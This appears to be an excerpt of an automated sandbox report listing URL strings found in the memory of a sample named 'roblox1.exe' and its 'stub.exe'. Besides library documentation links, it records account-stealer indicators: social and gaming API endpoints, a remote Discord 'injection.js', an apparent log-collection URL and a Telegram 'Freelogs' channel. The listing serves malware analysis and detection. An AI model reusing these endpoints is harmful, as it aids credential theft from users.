                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue37179
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/u.pngu.gifuunsupported
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, stub.exe, 00000003.00000002.1962486464.00007FFBAAF8B000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v8/guilds/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://discord.com/api/v8/guilds/u/invitesainvitesuhttps://discord.gg/acodeuhttps://t.me/TaroCloudF
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v8/users/
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/web_advanced.html#application-s-config
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/web_advanced.html#application-s-configT
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938094967.00000213BE55C000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945319876.00000213BE561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filepreviews.io/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946318506.00000213BE9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/aio-libs/aiohttp/discussions/6044
                  Source: stub.exe, 00000003.00000002.1949463983.00000213BF514000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/9253
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1328)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1329)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/1330)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/136
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/251
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/428
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/28073
                  Source: stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/hynek).
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gql.twitch.tv/gql
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://gql.twitch.tv/gqlT
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hynek.me/articles/import-attrs/)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/accounts/current_user/?edit=true
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://i.instagram.com/api/v1/accounts/current_user/?edit=trueuhttps://i.instagram.com/api/v1/users
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/users/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://instagram.com/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klaviyo.com/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1938065782.00000213BE603000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945647945.00000213BE608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547712572.00007FF7D065C000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://nuitka.net/info/segfault.html
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/me
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/meuNo
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://open.spotify.com/user/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://open.spotify.com/user/u
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0649/)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0749/)-implementing
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/attrs/)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1961361267.00007FFBAAD33000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://raw.githubusercontent.com/justforMonster/injection/main/injection.js
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://raw.githubusercontent.com/justforMonster/injection/main/injection.jsanulluMain.GetInjectionC
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://restores.name/log
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://restores.name/logaYWC7WVTV3UDR8DUg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
                  Source: stub.exe, 00000003.00000002.1946318506.00000213BE9A0000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1949761469.00000213BF5A0000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                  Source: stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/TaroCloudFreelogs
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEC8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1943034035.00000213BDE98000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/TaroCloudFreelogs----------------------
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
